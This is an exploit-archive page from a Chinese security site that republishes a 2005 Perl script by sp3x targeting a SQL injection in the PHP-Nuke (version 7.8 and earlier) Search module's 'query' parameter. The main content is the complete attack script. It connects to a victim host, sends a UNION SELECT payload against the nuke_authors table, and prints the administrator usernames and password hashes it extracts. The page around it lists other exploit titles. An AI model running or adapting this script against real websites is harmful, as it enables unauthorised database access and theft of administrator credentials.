首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP-Nuke Search Module query Parameter Remote SQL Injection Exploit
来源:SecurityReason.com 作者:sp3x 发布时间:2005-11-21  

PHP-Nuke Search Module "query" Parameter Remote SQL Injection Exploit


#!/usr/bin/perl -w
use IO::Socket;

#==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'query' |
# SQL injection vuln in Search module. |
# |
# References: |
# securityreason.com/achievement_securityalert/27 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/
if (@ARGV < 2)
{
print "*---------------------------------------*\n";
print "* SecurityReason *\n";
print "* EXPLOIT for PHPNuke <=7.8 *\n";
print "* Coded by : sp3x Date : 15.11.2005 *\n";
print "*---------------------------------------*\n\n";
print " Usage : \n";
print " PHPNuke-sp3x[1] HOST /[path_phpnuke] \n\n";
print " HOST - Host where is phpnuke example: localhost \n\n";
print " Example :\n\n";
print " PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ \n\n";
exit();
}

$HOST = $ARGV[0];
$phpnuke_path = $ARGV[1];

print "\n";
print "Host : $HOST\n";
print "phpnuke_path : $phpnuke_path\n";
print "\n";
$OK = 0;
$modules = "modules.php";
$query = "name=Search&query=s%')/**/UNION/**/SELECT/**/0,pwd,0,aid,0,0,0,0,0,0/**/FROM/*
*/nuke_authors/*";
$length = length $query;
$GET = $phpnuke_path . $modules;
print "[*] Connecting at victim host [OK]\n";
$send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80"
) || die "[*] Connect [FAILED]\n";
print "[*] Connected [OK]\n";
print "[*] Sending exploit [OK]\n\n";
print $send "POST ".$GET." HTTP/1.0\n";
print $send "Host: ".%HOST."\n";
print $send "Referer: http://".%HOST.$phpnuke_path."modules.php?name=Search \r\n";
print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: ".$length."\n\n";
print $send $query;
print $send "Cookie: lang=english\r\n\r\n";
print $send "Connection: close\n\n";

print "[*] Exploit send [OK]\n";
print "[*] Wait for reply...[OK]\n";
while ($answer = <$send>)
{
if ($answer =~ /=0"><b>([^:]*)<\/b>/ ) {
$OK = 1;
print "[*] Success [OK]\n";
print "[*] USER: $1\n";
}
if ($answer =~ /=\"0">([^:]*)<\/a>/ ) {
$OK = 1;
print "[*] PASSWORD: $1\n";
}
}
if ($OK == 0) { print "[*] Exploit [FAILED]\n"; }




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows 2000 Server UPNP DoS
·freeFTPd <= 1.0.8 USER Comm
·WF-Downloads Module for XOOPS
·Macromedia Flash Player Flash.
·Snort <= 2.4.2 Back Orifice
·freeFTPd <= 1.0.8 USER Comm
·SuSE Linux pwdutils chfn Utili
·MailEnable IMAPd W3C Logging F
·F-Secure Anti-Virus and Intern
·Google Mini Search Appliance P
·Linux ftpd SSL Buffer Overflow
·sudo Local Privilege Escalatio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved